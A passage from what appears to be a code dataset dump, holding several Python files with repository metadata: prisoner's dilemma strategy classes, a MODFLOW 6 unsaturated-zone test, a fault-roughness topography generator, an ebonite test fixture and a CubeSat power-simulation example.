self.score += r.value
def end(self):
return self.score
class AlwaysDefect:
def __init__(self) -> None:
self.score = 0
def run(self):
return D
def next(self, r):
self.score += r.value
def end(self):
return self.score
class Random:
def __init__(self) -> None:
self.score = 0
def run(self):
return random.choice([C, D])
def next(self, r):
self.score += r.value
def end(self):
return self.score
class Downing:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return D
if self.coop_count / self.game_count > 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
class Downing2:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return C
if self.coop_count / self.game_count >= 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
class Grudger:
def __init__(self) -> None:
self.score = 0
self.defected = False
def run(self):
if self.defected:
return D
return C
def next(self, r):
self.score += r.value
if not opponent(r):
self.defected = True
def end(self):
return self.score
class Joss:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
if random.randint(1, 10) == 1:
return D
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
class Tester:
def __init__(self) -> None:
self.score = 0
self.decision = True
self.test_tft = False
self.game_count = 0
def run(self):
if self.game_count == 0:
return D
return self.decision
def next(self, r):
self.score += r.value
if self.game_count == 1 & (not opponent(r)):
self.test_tft = True
elif self.test_tft:
self.decision = opponent(r)
elif self.game_count <= 2:
self.decision = True
else:
self.decision = not self.decision
self.game_count += 1
def end(self):
self.decision = True
self.test_tft = False
self.game_count = 0
return self.score
| true
| true
|
f705226f63166954703af3428c9ff9c96723765d
| 8,341
|
py
|
Python
|
autotest/test_gwf_uzf_surfdep.py
|
mkennard-aquaveo/modflow6
|
73a0553636362c90f7d134318e1f5d902dbdc4d3
|
[
"CC0-1.0"
] | null | null | null |
autotest/test_gwf_uzf_surfdep.py
|
mkennard-aquaveo/modflow6
|
73a0553636362c90f7d134318e1f5d902dbdc4d3
|
[
"CC0-1.0"
] | null | null | null |
autotest/test_gwf_uzf_surfdep.py
|
mkennard-aquaveo/modflow6
|
73a0553636362c90f7d134318e1f5d902dbdc4d3
|
[
"CC0-1.0"
] | null | null | null |
import os
import pytest
import sys
import numpy as np
import shutil
import subprocess
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
import targets
mf6_exe = os.path.abspath(targets.target_dict["mf6"])
testname = "uzf_3lay_srfdchk"
testdir = os.path.join("temp", testname)
os.makedirs(testdir, exist_ok=True)
everything_was_successful = True
iuz_cell_dict = {}
cell_iuz_dict = {}
def build_model():
    """Build the MF6 simulation used by the SURFDEP check test.

    Constructs a 3-layer, 1-row, 10-column model whose layer-1 UZF cells
    carry SURFDEP = 6, larger than the ~2-5 m layer-1 cell thickness, so
    MODFLOW 6 is expected to reject them (8 such cells -> 8 errors).

    Side effect: populates the module-level iuz_cell_dict / cell_iuz_dict
    lookup tables from the UZF package data.

    Returns the assembled flopy.mf6.MFSimulation (not yet written or run).
    """
    nlay, nrow, ncol = 3, 1, 10
    nper = 1
    perlen = [20.0]
    nstp = [10]
    tsmult = len(perlen) * [1.0]
    delr = 1.0
    delc = 1.0
    strt = -25
    # Layer bottoms; the uneven first layer gives cell thicknesses of 2-5 m.
    botm = [
        [-5.0, -4.0, -3.0, -3.0, -2.0, -5.0, -4.0, -3.0, -3.0, -2.0],
        [-20, -20, -20, -20, -20, -20, -20, -20, -20, -20],
        [-30, -30, -30, -30, -30, -30, -30, -30, -30, -30],
    ]
    # Solver iteration limits and closure criteria.
    nouter, ninner = 100, 300
    hclose, rclose, relax = 1e-9, 1e-3, 0.97
    tdis_rc = []
    for i in range(nper):
        tdis_rc.append((perlen[i], nstp[i], tsmult[i]))
    name = testname
    # build MODFLOW 6 files
    ws = testdir
    sim = flopy.mf6.MFSimulation(
        sim_name=name, version="mf6", exe_name=mf6_exe, sim_ws=ws
    )
    # create tdis package
    tdis = flopy.mf6.ModflowTdis(
        sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
    )
    # create gwf model
    gwf = flopy.mf6.ModflowGwf(
        sim, modelname=name, newtonoptions="NEWTON", save_flows=True
    )
    # create iterative model solution and register the gwf model with it
    ims = flopy.mf6.ModflowIms(
        sim,
        print_option="SUMMARY",
        complexity="MODERATE",
        outer_dvclose=hclose,
        outer_maximum=nouter,
        under_relaxation="DBD",
        inner_maximum=ninner,
        inner_dvclose=hclose,
        rcloserecord=rclose,
        linear_acceleration="BICGSTAB",
        scaling_method="NONE",
        reordering_method="NONE",
        relaxation_factor=relax,
    )
    sim.register_ims_package(ims, [gwf.name])
    # discretization package
    dis = flopy.mf6.ModflowGwfdis(
        gwf,
        nlay=nlay,
        nrow=nrow,
        ncol=ncol,
        delr=delr,
        delc=delc,
        top=0.0,
        botm=botm,
    )
    # initial conditions
    ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
    # node property flow
    npf = flopy.mf6.ModflowGwfnpf(
        gwf, save_flows=True, icelltype=1, k=100.0, k33=10
    )
    # aquifer storage
    sto = flopy.mf6.ModflowGwfsto(
        gwf, iconvert=1, ss=1e-5, sy=0.2, transient=True
    )
    # chd files: single constant head in the bottom layer's first cell
    chdval = -3.0
    chdspd = {0: [[(2, 0, 0), chdval]]}
    chd = flopy.mf6.ModflowGwfchd(
        gwf, print_flows=True, stress_period_data=chdspd
    )
    # transient uzf info
    # iuzno  cellid landflg ivertcn surfdp vks thtr thts thti eps [bndnm]
    # Layer-1 cells (landflg=1) get surfdp=6, deliberately exceeding cell
    # thickness; deeper cells use 0.1 and chain vertically via ivertcn.
    uzf_pkdat = [
        [0, (0, 0, 1), 1, 8, 6, 1, 0.05, 0.35, 0.05, 4, "uzf01"],
        [1, (0, 0, 2), 1, 9, 6, 1, 0.05, 0.35, 0.05, 4, "uzf02"],
        [2, (0, 0, 3), 1, 10, 6, 1, 0.05, 0.35, 0.05, 4, "uzf03"],
        [3, (0, 0, 4), 1, 11, 6, 1, 0.05, 0.35, 0.05, 4, "uzf04"],
        [4, (0, 0, 5), 1, 12, 6, 1, 0.05, 0.35, 0.05, 4, "uzf05"],
        [5, (0, 0, 6), 1, 13, 6, 1, 0.05, 0.35, 0.05, 4, "uzf06"],
        [6, (0, 0, 7), 1, 14, 6, 1, 0.05, 0.35, 0.05, 4, "uzf07"],
        [7, (0, 0, 8), 1, 15, 6, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
        [8, (1, 0, 1), 0, 16, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
        [9, (1, 0, 2), 0, 17, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf10"],
        [10, (1, 0, 3), 0, 18, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf11"],
        [11, (1, 0, 4), 0, 19, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf12"],
        [12, (1, 0, 5), 0, 20, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf13"],
        [13, (1, 0, 6), 0, 21, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf14"],
        [14, (1, 0, 7), 0, 22, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf15"],
        [15, (1, 0, 8), 0, 23, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf16"],
        [16, (2, 0, 1), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf17"],
        [17, (2, 0, 2), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf18"],
        [18, (2, 0, 3), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf19"],
        [19, (2, 0, 4), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf20"],
        [20, (2, 0, 5), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf21"],
        [21, (2, 0, 6), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf22"],
        [22, (2, 0, 7), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf23"],
        [23, (2, 0, 8), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf24"],
    ]
    # Record iuzno <-> cellid lookups in the module-level dictionaries.
    for itm in uzf_pkdat:
        iuz_cell_dict.update({itm[0]: (itm[1][0], itm[1][1], itm[1][2])})
        cell_iuz_dict.update({(itm[1][0], itm[1][1], itm[1][2]): itm[0]})
    extdp = 15.0
    pet = 0.001
    zero = 0.0
    # Stress period data: infiltration only on the land-surface cells (0-7).
    uzf_spd = {
        0: [
            [0, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
            [1, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
            [2, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
            [3, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
            [4, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
            [5, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
            [6, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
            [7, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
            [8, zero, pet, extdp, 7.0e-02, zero, zero, zero],
            [9, zero, pet, extdp, 7.0e-02, zero, zero, zero],
            [10, zero, pet, extdp, 7.0e-02, zero, zero, zero],
            [11, zero, pet, extdp, 7.0e-02, zero, zero, zero],
            [12, zero, pet, extdp, 7.0e-02, zero, zero, zero],
            [13, zero, pet, extdp, 7.0e-02, zero, zero, zero],
            [14, zero, pet, extdp, 7.0e-02, zero, zero, zero],
            [15, zero, pet, extdp, 7.0e-02, zero, zero, zero],
        ]
    }
    uzf = flopy.mf6.ModflowGwfuzf(
        gwf,
        print_flows=True,
        save_flows=True,
        simulate_et=True,
        simulate_gwseep=True,
        linear_gwet=True,
        boundnames=True,
        ntrailwaves=15,
        nwavesets=40,
        nuzfcells=len(uzf_pkdat),
        packagedata=uzf_pkdat,
        perioddata=uzf_spd,
        budget_filerecord="{}.uzf.bud".format(name),
        filename="{}.uzf".format(name),
    )
    # output control
    oc = flopy.mf6.ModflowGwfoc(
        gwf,
        budget_filerecord="{}.cbc".format(name),
        head_filerecord="{}.hds".format(name),
        headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
        saverecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
        printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
        filename="{}.oc".format(name),
    )
    return sim
# - No need to change any code below
def test_mf6model():
    """Run the surfdep-check model and verify MF6 emits the expected errors.

    Builds and runs the simulation, then scans mfsim.lst for lines that
    mention both SURFDEP and "cannot"; exactly 8 such errors are expected
    (one per land-surface UZF cell with an oversized SURFDEP).
    """
    # build and run the test model
    sim = build_model()
    sim.write_simulation()
    sim.run_simulation()
    # ensure that the error msg is contained in the mfsim.lst file
    error_count = 0
    # `with` closes the listing file even if an assertion fires below
    # (the original leaked the handle).
    with open(os.path.join(testdir, "mfsim.lst"), "r") as f:
        for line in f:
            # BUG FIX: the original condition `"SURFDEP" and "cannot" in line`
            # treated "SURFDEP" as a truthy constant and only ever tested
            # `"cannot" in line`; require both substrings explicitly.
            if "SURFDEP" in line and "cannot" in line:
                error_count += 1
    assert error_count == 8, (
        "error count = " + str(error_count) + " but should equal 8"
    )
    print("Finished running surfdep check")
    return
def main():
    """Standalone entry point: same check as test_mf6model().

    Builds and runs the simulation, then scans mfsim.lst for lines that
    mention both SURFDEP and "cannot"; exactly 8 such errors are expected.
    """
    # build and run the test model
    sim = build_model()
    sim.write_simulation()
    sim.run_simulation()
    # ensure that the error msg is contained in the mfsim.lst file
    error_count = 0
    # `with` closes the listing file even if an assertion fires below
    # (the original leaked the handle).
    with open(os.path.join(testdir, "mfsim.lst"), "r") as f:
        for line in f:
            # BUG FIX: the original condition `"SURFDEP" and "cannot" in line`
            # treated "SURFDEP" as a truthy constant and only ever tested
            # `"cannot" in line`; require both substrings explicitly.
            if "SURFDEP" in line and "cannot" in line:
                error_count += 1
    assert error_count == 8, (
        "error count = " + str(error_count) + " but should equal 8"
    )
    print("Finished running surfdep check")
    return
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
| 30.665441
| 79
| 0.531111
|
import os
import pytest
import sys
import numpy as np
import shutil
import subprocess
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
import targets
mf6_exe = os.path.abspath(targets.target_dict["mf6"])
testname = "uzf_3lay_srfdchk"
testdir = os.path.join("temp", testname)
os.makedirs(testdir, exist_ok=True)
everything_was_successful = True
iuz_cell_dict = {}
cell_iuz_dict = {}
def build_model():
nlay, nrow, ncol = 3, 1, 10
nper = 1
perlen = [20.0]
nstp = [10]
tsmult = len(perlen) * [1.0]
delr = 1.0
delc = 1.0
strt = -25
botm = [
[-5.0, -4.0, -3.0, -3.0, -2.0, -5.0, -4.0, -3.0, -3.0, -2.0],
[-20, -20, -20, -20, -20, -20, -20, -20, -20, -20],
[-30, -30, -30, -30, -30, -30, -30, -30, -30, -30],
]
nouter, ninner = 100, 300
hclose, rclose, relax = 1e-9, 1e-3, 0.97
tdis_rc = []
for i in range(nper):
tdis_rc.append((perlen[i], nstp[i], tsmult[i]))
name = testname
ws = testdir
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name=mf6_exe, sim_ws=ws
)
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
gwf = flopy.mf6.ModflowGwf(
sim, modelname=name, newtonoptions="NEWTON", save_flows=True
)
ims = flopy.mf6.ModflowIms(
sim,
print_option="SUMMARY",
complexity="MODERATE",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="DBD",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="BICGSTAB",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
)
sim.register_ims_package(ims, [gwf.name])
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=0.0,
botm=botm,
)
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=True, icelltype=1, k=100.0, k33=10
)
sto = flopy.mf6.ModflowGwfsto(
gwf, iconvert=1, ss=1e-5, sy=0.2, transient=True
)
chdval = -3.0
chdspd = {0: [[(2, 0, 0), chdval]]}
chd = flopy.mf6.ModflowGwfchd(
gwf, print_flows=True, stress_period_data=chdspd
)
uzf_pkdat = [
[0, (0, 0, 1), 1, 8, 6, 1, 0.05, 0.35, 0.05, 4, "uzf01"],
[1, (0, 0, 2), 1, 9, 6, 1, 0.05, 0.35, 0.05, 4, "uzf02"],
[2, (0, 0, 3), 1, 10, 6, 1, 0.05, 0.35, 0.05, 4, "uzf03"],
[3, (0, 0, 4), 1, 11, 6, 1, 0.05, 0.35, 0.05, 4, "uzf04"],
[4, (0, 0, 5), 1, 12, 6, 1, 0.05, 0.35, 0.05, 4, "uzf05"],
[5, (0, 0, 6), 1, 13, 6, 1, 0.05, 0.35, 0.05, 4, "uzf06"],
[6, (0, 0, 7), 1, 14, 6, 1, 0.05, 0.35, 0.05, 4, "uzf07"],
[7, (0, 0, 8), 1, 15, 6, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
[8, (1, 0, 1), 0, 16, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
[9, (1, 0, 2), 0, 17, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf10"],
[10, (1, 0, 3), 0, 18, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf11"],
[11, (1, 0, 4), 0, 19, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf12"],
[12, (1, 0, 5), 0, 20, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf13"],
[13, (1, 0, 6), 0, 21, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf14"],
[14, (1, 0, 7), 0, 22, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf15"],
[15, (1, 0, 8), 0, 23, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf16"],
[16, (2, 0, 1), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf17"],
[17, (2, 0, 2), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf18"],
[18, (2, 0, 3), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf19"],
[19, (2, 0, 4), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf20"],
[20, (2, 0, 5), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf21"],
[21, (2, 0, 6), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf22"],
[22, (2, 0, 7), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf23"],
[23, (2, 0, 8), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf24"],
]
for itm in uzf_pkdat:
iuz_cell_dict.update({itm[0]: (itm[1][0], itm[1][1], itm[1][2])})
cell_iuz_dict.update({(itm[1][0], itm[1][1], itm[1][2]): itm[0]})
extdp = 15.0
pet = 0.001
zero = 0.0
uzf_spd = {
0: [
[0, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[1, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[2, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[3, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[4, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[5, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[6, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[7, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[8, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[9, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[10, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[11, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[12, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[13, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[14, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[15, zero, pet, extdp, 7.0e-02, zero, zero, zero],
]
}
uzf = flopy.mf6.ModflowGwfuzf(
gwf,
print_flows=True,
save_flows=True,
simulate_et=True,
simulate_gwseep=True,
linear_gwet=True,
boundnames=True,
ntrailwaves=15,
nwavesets=40,
nuzfcells=len(uzf_pkdat),
packagedata=uzf_pkdat,
perioddata=uzf_spd,
budget_filerecord="{}.uzf.bud".format(name),
filename="{}.uzf".format(name),
)
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
filename="{}.oc".format(name),
)
return sim
def test_mf6model():
sim = build_model()
sim.write_simulation()
sim.run_simulation()
f = open(os.path.join(testdir, "mfsim.lst"), "r")
lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
assert error_count == 8, (
"error count = " + str(error_count) + "but should equal 8"
)
print("Finished running surfdep check")
return
def main():
sim = build_model()
sim.write_simulation()
sim.run_simulation()
f = open(os.path.join(testdir, "mfsim.lst"), "r")
lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
assert error_count == 8, (
"error count = " + str(error_count) + "but should equal 8"
)
print("Finished running surfdep check")
return
if __name__ == "__main__":
print("standalone run of {}".format(os.path.basename(__file__)))
main()
| true
| true
|
f70522e7e78a3344ab563ab228f5eece99510bcf
| 584
|
py
|
Python
|
tpv29/generate_mytopo_tpv29.py
|
sebwolf-de/Examples
|
329db390d540e6f5fe1dff35372528f723882271
|
[
"BSD-3-Clause"
] | 3
|
2021-08-16T12:57:52.000Z
|
2021-11-02T23:39:36.000Z
|
tpv29/generate_mytopo_tpv29.py
|
sebwolf-de/Examples
|
329db390d540e6f5fe1dff35372528f723882271
|
[
"BSD-3-Clause"
] | 22
|
2020-09-25T12:52:04.000Z
|
2022-02-09T14:51:20.000Z
|
tpv29/generate_mytopo_tpv29.py
|
sebwolf-de/Examples
|
329db390d540e6f5fe1dff35372528f723882271
|
[
"BSD-3-Clause"
] | 11
|
2018-10-11T09:04:42.000Z
|
2021-12-06T17:17:39.000Z
|
import numpy as np

# Read scec input file: one title line, one header line (nx ny lx ly),
# then one whitespace-separated row per grid node.
# FIX: use context managers so the file handles are closed even on error
# (the original opened both files without closing guarantees).
with open("tpv29_tpv30_geometry_25m_data.txt") as fid:
    fid.readline()  # skip the title line
    header = [float(a) for a in fid.readline().split()]
    nx, ny, lx, ly = header
    # Column index 4 holds the roughness values used downstream.
    roughness = np.loadtxt(fid)[:, 4]

# create x and y vectors spanning the fault plane
x = np.linspace(-lx / 2, lx / 2, int(nx) + 1)
y = np.linspace(0, ly, int(ny) + 1)

# write mytopo_tpv29: grid dimensions, then x, y and roughness columns
with open("mytopo_tpv29", "w") as fout:
    fout.write("%d %d\n" % (nx + 1, ny + 1))
    np.savetxt(fout, x, fmt="%f")
    np.savetxt(fout, y, fmt="%f")
    np.savetxt(fout, roughness, fmt="%f")
| 24.333333
| 47
| 0.64726
|
import numpy as np
fid = open("tpv29_tpv30_geometry_25m_data.txt")
line = fid.readline()
line = fid.readline()
header = [float(a) for a in line.split()]
nx, ny, lx, ly = header
roughness = np.loadtxt(fid)
roughness = roughness[:, 4]
fid.close()
x = np.linspace(-lx / 2, lx / 2, int(nx) + 1)
y = np.linspace(0, ly, int(ny) + 1)
fout = open("mytopo_tpv29", "w")
fout.write("%d %d\n" % (nx + 1, ny + 1))
np.savetxt(fout, x, fmt="%f")
np.savetxt(fout, y, fmt="%f")
np.savetxt(fout, roughness, fmt="%f")
fout.close()
| true
| true
|
f70523fc884ca9381af67d78c3f7c35fb8498822
| 284
|
py
|
Python
|
tests/client/test_inmemory/conftest.py
|
zyfra/ebonite
|
b01b662c43709d152940f488574d78ff25f89ecf
|
[
"Apache-2.0"
] | 270
|
2019-11-14T15:46:08.000Z
|
2021-09-17T16:43:03.000Z
|
tests/client/test_inmemory/conftest.py
|
leepand/ebonite
|
b01b662c43709d152940f488574d78ff25f89ecf
|
[
"Apache-2.0"
] | 14
|
2019-11-29T11:49:39.000Z
|
2022-02-10T00:23:59.000Z
|
tests/client/test_inmemory/conftest.py
|
leepand/ebonite
|
b01b662c43709d152940f488574d78ff25f89ecf
|
[
"Apache-2.0"
] | 18
|
2019-11-22T13:15:14.000Z
|
2021-09-01T13:36:12.000Z
|
import pytest
from ebonite.client import Ebonite
from tests.client.conftest import create_client_hooks
@pytest.fixture
def inmemory_ebnt():
    """Yield an Ebonite client backed entirely by in-memory repositories."""
    ebnt = Ebonite.inmemory()
    yield ebnt

# Generate the pytest hooks that run the shared client test-suite against
# the in-memory fixture defined above.
pytest_runtest_protocol, pytest_collect_file = create_client_hooks(inmemory_ebnt, 'inmemory')
| 20.285714
| 93
| 0.806338
|
import pytest
from ebonite.client import Ebonite
from tests.client.conftest import create_client_hooks
@pytest.fixture
def inmemory_ebnt():
ebnt = Ebonite.inmemory()
yield ebnt
pytest_runtest_protocol, pytest_collect_file = create_client_hooks(inmemory_ebnt, 'inmemory')
| true
| true
|
f70524256bdfc9b0876254c7efcadd8c12f51182
| 3,165
|
py
|
Python
|
example1.py
|
srujan71/CubeSat-Mission-Planner
|
34030254109def0b13e82116ed5122ecf79a82f7
|
[
"MIT"
] | 1
|
2021-07-26T16:17:30.000Z
|
2021-07-26T16:17:30.000Z
|
example1.py
|
leizhang2020/CubeSat-Mission-Planner
|
62d1ad33c2dcb1a2f8fb3ff615cc5cc0e6716969
|
[
"MIT"
] | null | null | null |
example1.py
|
leizhang2020/CubeSat-Mission-Planner
|
62d1ad33c2dcb1a2f8fb3ff615cc5cc0e6716969
|
[
"MIT"
] | 2
|
2021-09-18T08:50:44.000Z
|
2022-01-20T02:41:38.000Z
|
"""
example1.py
"A simple example how to use the CubeSat-Power-Estimation tool."
@author: Johan Monster (https://github.com/Hans-Bananendans/)
"""
# Import packages
import numpy as np
import pandas as pd
from mission import Mission
# Defining the config
config = {
"years_passed" : 0, # How many [years] the satellite has been in space for
"battery_capacity" : 81000, # Battery capacity in [W.s] (or: Joule)
"battery_degradation_factor" : 0.04,
"battery_init" : 0.5, # 0.5 = Battery begins at 50% charge
"panel_degradation_factor" : 0.02,
"blip_period" : 30, # Currently unused, telemetry blip period
"blip_duration" : 1, # Currently unused, telemetry blip duration
"no_blips" : ["downlink"], # Currently unused
"orbital_altitude" : 550 # Orbital altitude in [km]
}
# List of the names of all used EPS channels.
channels = ["None", "5V_1", "5V_2", "5V_3", "5V_4", "3.3V_1", \
"3.3V_2", "3.3V_3", "3.3V_4", "Var_rail"]
# Dict of typical voltage supplied to each channel.
channel_voltages = {
"5V_1" : 5,
"5V_2" : 5,
"5V_3" : 5,
"5V_4" : 5,
"3.3V_1" : 3.3,
"3.3V_2" : 3.3,
"3.3V_3" : 3.3,
"3.3V_4" : 3.3,
"Var_rail" : 6.5 # Can between 6.5-8 VDC, highest current is at 6.5V
}
# Dict specifiying which device is on which EPS channel
device_channels = {
"adcs" : "5V_4",
"payload_dice" : "5V_3",
"payload_bitflip" : "3.3V_3",
"antenna" : "3.3V_4",
"obc" : "5V_2",
"obc_board" : "5V_2",
"rx" : "Var_rail",
"tx" : "Var_rail",
"eps" : "None",
"sensors_1" : "3.3V_2",
"sensors_2" : "3.3V_4",
}
# List of all possible OpStates the satellite can be in.
# This list must be consistent with the specified power.xlsx
state_list = ["idle","recharge","dice_payload","wheel_unloading", \
"transponder","downlink","safe_mode","recovery_mode", \
"detumbling_mode"]
# Dict of which colour will be used for each OpState whilst plotting
state_colours = {
"idle" : "#ffffff",
"recharge" : "#2ca02c",
"dice_payload" : "#8000ff",
"wheel_unloading" : "#0080ff",
"transponder" : "#ff8000",
"downlink" : "#ff0000",
"safe_mode" : "#4000ff",
"recovery_mode" : "#777777",
"detumbling_mode" : "#ff00ff"
}
# Baby's first satellite schedule
schedule1 = {
0 : "idle",
50 : "downlink",
100 : "recharge"
}
# Loading the power frame, or the device/OpState table
power_frame = pd.read_excel('power.xlsx',index_col=0)
# Loading the two power input vectors, generated by CubeSat-Solar-Estimator
p_sun = np.load("P_sun.npy")
p_alb = np.load("P_alb.npy")
# Assembling the mission object
m1 = Mission(config, device_channels, state_list, channels, \
power_frame, p_sun, p_alb)
# Calling the Mission.propagate() method to start the simulation
results = m1.propagate(schedule1, tsim=200, dt=1)
# Plotting
m1.plot_timeline_power(state_colours)
| 29.858491
| 78
| 0.594945
|
import numpy as np
import pandas as pd
from mission import Mission
config = {
"years_passed" : 0,
"battery_capacity" : 81000,
"battery_degradation_factor" : 0.04,
"battery_init" : 0.5,
"panel_degradation_factor" : 0.02,
"blip_period" : 30,
"blip_duration" : 1,
"no_blips" : ["downlink"],
"orbital_altitude" : 550
}
channels = ["None", "5V_1", "5V_2", "5V_3", "5V_4", "3.3V_1", \
"3.3V_2", "3.3V_3", "3.3V_4", "Var_rail"]
channel_voltages = {
"5V_1" : 5,
"5V_2" : 5,
"5V_3" : 5,
"5V_4" : 5,
"3.3V_1" : 3.3,
"3.3V_2" : 3.3,
"3.3V_3" : 3.3,
"3.3V_4" : 3.3,
"Var_rail" : 6.5
}
device_channels = {
"adcs" : "5V_4",
"payload_dice" : "5V_3",
"payload_bitflip" : "3.3V_3",
"antenna" : "3.3V_4",
"obc" : "5V_2",
"obc_board" : "5V_2",
"rx" : "Var_rail",
"tx" : "Var_rail",
"eps" : "None",
"sensors_1" : "3.3V_2",
"sensors_2" : "3.3V_4",
}
state_list = ["idle","recharge","dice_payload","wheel_unloading", \
"transponder","downlink","safe_mode","recovery_mode", \
"detumbling_mode"]
state_colours = {
"idle" : "#ffffff",
"recharge" : "#2ca02c",
"dice_payload" : "#8000ff",
"wheel_unloading" : "#0080ff",
"transponder" : "#ff8000",
"downlink" : "#ff0000",
"safe_mode" : "#4000ff",
"recovery_mode" : "#777777",
"detumbling_mode" : "#ff00ff"
}
schedule1 = {
0 : "idle",
50 : "downlink",
100 : "recharge"
}
# Loading the power frame, or the device/OpState table
power_frame = pd.read_excel('power.xlsx',index_col=0)
# Loading the two power input vectors, generated by CubeSat-Solar-Estimator
p_sun = np.load("P_sun.npy")
p_alb = np.load("P_alb.npy")
# Assembling the mission object
m1 = Mission(config, device_channels, state_list, channels, \
power_frame, p_sun, p_alb)
# Calling the Mission.propagate() method to start the simulation
results = m1.propagate(schedule1, tsim=200, dt=1)
# Plotting
m1.plot_timeline_power(state_colours)
| true
| true
|
